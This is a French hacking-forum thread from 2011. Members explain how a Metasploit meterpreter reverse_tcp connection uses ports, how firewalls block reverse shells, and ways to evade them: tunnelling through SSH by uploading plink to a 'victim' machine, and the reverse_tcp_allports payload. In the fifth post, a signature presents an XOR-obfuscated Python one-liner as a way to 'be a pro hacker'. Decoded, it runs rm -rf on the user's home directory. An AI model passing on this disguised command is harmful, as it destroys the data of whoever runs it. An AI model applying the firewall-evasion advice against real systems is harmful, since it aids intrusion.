Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 07-06-2011 19:11:15

Lucas021
Membre Hyperactif
Inscription : 05-11-2010
Messages : 52

Le Protcole qu'utilise Metasploit

Salut tout le monde smile

Je me demandais quand j'utilisais Meterpreter avec une payloads reverse/tcp, par quelle protocole Metasploit
établissait une session avec une victime; J'avais pensée a une Connection SSH puis faire passer un tunnel dedans
mais je suis pas sur.
De plus j'ai remarqué après avoir établis une session meterpreter en Reverse_tcp  la ligne suivante:
"192.168.1.95:4444 -> 192.168.1.92:3774"
Ou
192.168.1.95 est l'attaquant (LHOST) avec en LPORT: 4444
192.168.1.92 est la victime

Et j'ai pas très bien compris, la victime se connecte t'elle sur mon pc par le port 4444 ou le port 3774.

Quand un Firewall d'un victime bloque une connexion reverse, elle bloque bien le port 4444 ?

Merci, et bonne soirée

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 07-06-2011 19:29:55

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Le Protcole qu'utilise Metasploit

Le seul "protocole" que Metasploit utilise c'est le TCP. Il n'y a pas de protocole spécifique utilisé plus haut dans le modèle OSI (http,...). Certains payloads permettent un trafic en HTTPS je pense, et c'est vrai que tu peux toujours faire passer la connexion TCP à travers un tunnel SSH, mais de base Metasploit utilise son propre "langage" smile

Si la connexion est en reverse, tu ouvres ton port 4444 pour qu'une victime vienne s'y connecter. Après, le port que elle choisit pour le faire est aléatoire et n'a pas beaucoup d'importance. C'est la même chose que quand tu vas sur le net en fait : quand tu te connectes à google.fr sur le port 80, toi tu utilises un autre port (aléatoire) mais son numéro n'a pas d'importance tant qu'il n'est utilisé que pour une seule connexion à la fois.

Quand un firewall bloque une connexion en reverse, il le fait sur le port de destination (ici : le 4444) puisque c'est lui qui indique de quel type de trafic (ou d'application) il s'agit. Comme le port sur la machine-cible est aléatoire, il ne saurait rien en déduire... Dans l'exemple que tu donnes, elle utilise son port 3774 pour se connecter à ton serveur sur le 4444 wink

L'usage veut que les 1024 premiers ports soient "réservés" pour les services (donc non utilisés pour des connections sortantes), les ports 1025 à 9999 pour les applications et les ports 10000 à 65535 pour le NAT (qui a besoin de changer les numéros de ports des connexions à la volée, donc il peut en nécessiter beaucoup). Après, ce n'est pas une règle absolue, tu es libre d'utiliser tes ports un peu comme tu le veux, mais généralement les gens s'en tiennent à ce fonctionnement.

Hors Ligne

#3 07-06-2011 19:32:54

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell
Inscription : 13-12-2010
Messages : 783

Re : Le Protcole qu'utilise Metasploit

La coquille meterpreter lorsqu'elle est exécutée ouvre le port 3774 sur la machine de la victime et ce dernier communique avec le port 4444 de la machine de l'attaquant, donc le port 4444 n'est pas ouvert sur la machine de la victime. S'il y a la présence d'un firewall sur la machine de la victime, celui-ci bloque effectivement une connexion reverse dans le cas ou il est configuré à bloquer toute connexions sortante qui n'est pas reconnue ( comme le pare-feu Commodo ) ou bien des pare-feu avec des regles autorisant certains ports.

Dernière modification par Fuji (07-06-2011 23:21:53)

Hors Ligne

#4 08-06-2011 20:37:17

Lucas021
Membre Hyperactif
Inscription : 05-11-2010
Messages : 52

Re : Le Protcole qu'utilise Metasploit

Merci pour vos réponse smile

C'est un peux plus clair pour moi maintenant, je ne savais pas que l'on utilisait un port aléatoire pour établir un connexion vers un autre port.
Je comprend déjà mieux les résultats de la commande netstat wink
Et si je comprend bien, la victime se connecte sur le port 4444 de mon pc via son port aléatoire, mais en retour, moi l'attaquant je me connecte sur son port aléatoire via le port 4444 (c'est sa ? ^^)

Sinon j'ai réfléchis pour la connexion en SSH Tunneling, mais est ce que sa serait possible de faire passer toutes les connexion Metasploit par un Proxy SOCKS que l'on aurait configurai avec Putty par exemple, afin de rediriger toute les requête vers l'attaquant dans le Tunnel SSH .
Je pense que sa pourrai être intéressant pour passer un Firewall, mais peut que être que Metasploit propose déjà une Payload de ce genre.

Hors Ligne

#5 08-06-2011 20:52:57

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Re : Le Protcole qu'utilise Metasploit

Un sujet = un topic !
Mais c'est tentant de te répondre que "oui, ça se fait".
J'ai même vu (suivi) une attaque "dynamique" ou toutes les 20min on changeait de port et de serveur-masque.
(ça plantait assez d'ailleurs ^^)

Putty n'est pas très pratique. Je ne te la conseille pas.

De toute façon, une fois la 'ligne' établie, tu peux faire ce que tu veux ;-)


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#6 08-06-2011 21:39:29

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Le Protcole qu'utilise Metasploit

Et si je comprend bien, la victime se connecte sur le port 4444 de mon pc via son port aléatoire, mais en retour, moi l'attaquant je me connecte sur son port aléatoire via le port 4444 (c'est sa ? ^^)

Exact, une fois la connexion établie entre les 2 ports (aléatoire côté client, fixe côté serveur), elle est utilisée dans les 2 sens. T'imagines le bronx s'il fallait se renégocier un port pour chaque sens ? big_smile

Sinon j'ai réfléchis pour la connexion en SSH Tunneling, mais est ce que sa serait possible de faire passer toutes les connexion Metasploit par un Proxy SOCKS que l'on aurait configurai avec Putty par exemple, afin de rediriger toute les requête vers l'attaquant dans le Tunnel SSH .

Oui, c'est tout à fait possible, d'ailleurs c'est généralement comme ça que je fais (et j'en profite pour contourner le problème de l'IP dynamique de la cible). L'inconvénient c'est qu'il faut t'arranger pour uploader Putty (ou plus exactement sa version en ligne de commande, plink) sur la machine-victime. Ca demande un peu de créativité smile

A ma connaissance, Metasploit ne propose pas encore de payload qui encapsule son trafic dans un tunnel SSH (sans doute parce que c'est facile à mettre en place à côté). Il y a un payload qui te permet de travailler en HTTPS, ce qui a le même effet pour traverser les firewall en toute discrétion, mais ce n'est pas aussi flexible qu'un vrai tunnel, je trouve wink

[EDIT] Au temps pour moi Spawn, j'avais pas vu que t'avais répondu

Hors Ligne

#7 09-06-2011 04:58:51

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell
Inscription : 13-12-2010
Messages : 783

Re : Le Protcole qu'utilise Metasploit

Pour information, il existe un payload qui permet de contourner un firewall, il s’agit du :

windows/*/reverse_tcp_allports

Lorsqu’il s’exécute sur la machine compromise avec un firewall bloquant les connexions en sortie et ne laissant que certaine ports, le payload va alors essayer de relier la machine de l’attaquant en testant successivement tout les port de 1 jusqu’à 65535 jusqu'à trouver un port qui n’est pas bloquer par le firewall (mauvaise configuration de ce dernier, règle laxiste, etc.)
Je ne l’ai pas tester mais je sais qu’il est long puisqu’il permet de faire comme scan à la manière de Netcat, mais plus que ça je pense que sa configuration n’est pas simple wink

Dernière modification par Fuji (09-06-2011 04:59:37)

Hors Ligne

#8 11-06-2011 12:07:45

Lucas021
Membre Hyperactif
Inscription : 05-11-2010
Messages : 52

Re : Le Protcole qu'utilise Metasploit

D'accord merci,

J'avais commencé a faire quelque test pour le SSH Tunneling mais il on pas été très concluant...
Enfin j'irais voire sur le web si il parle de ce sujet.

Sinon pour le "reverse_tcp_allports" sa a l'air intéressant mais assez long c'est vrai, j'essaierai de le tester et je vous dirais.
Et pour ce qui veulent, je suis tombé sur sa :
Metasploit se dote d'un payload permettant de tirer profit d'une mauvaise configuration Firewall

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.026 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]